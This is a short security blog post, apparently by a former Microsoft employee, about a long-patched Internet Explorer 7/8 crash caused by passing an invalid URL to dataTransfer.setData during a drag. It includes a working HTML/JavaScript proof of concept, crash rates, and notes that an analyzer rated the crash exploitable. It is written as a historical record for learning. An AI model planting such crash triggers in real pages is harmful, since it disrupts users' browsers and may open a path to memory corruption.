IE DoS — dataTransfer.setData with Invalid URL

Setting an invalid URL in event.dataTransfer.setData("URL", ...) during a drag operation crashes IE. The !exploitable analyzer rated this EXPLOITABLE — EIP is changed, and the DEP access violation originates from an attacker-influenced address. The repro came directly from following MSDN’s own sample code.

<!-- datatransfer.html (loaded inside an iframe for higher crash rate) -->
<input id="t" ondragstart="InitiateDrag()" value="DragMe to the textBox below" size="30">
<input size="30">

<script type="text/javascript">
function InitiateDrag()
{
    // Crash happens here
    event.dataTransfer.setData("URL", "THIS_IS_AN_INVALID_URL");

    // Reload so you can retry dragging
    location.reload();
}
t.select();
</script>

The crash rate is roughly 1-in-3 when the PoC is loaded in an iframe, versus 1-in-12 when loaded directly. Drag the pre-selected text from the top input to the empty one below. Tested on Windows 7 IE8 (fully patched) and Vista IE7 (fully patched). A variation working 90% of the time on XP was also developed but not included here for simplicity.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Mark-of-the-Web + Flash XML to Read Local Files] :: [Silverlight 3 DoS — Uncaught Exception in CallMethod] >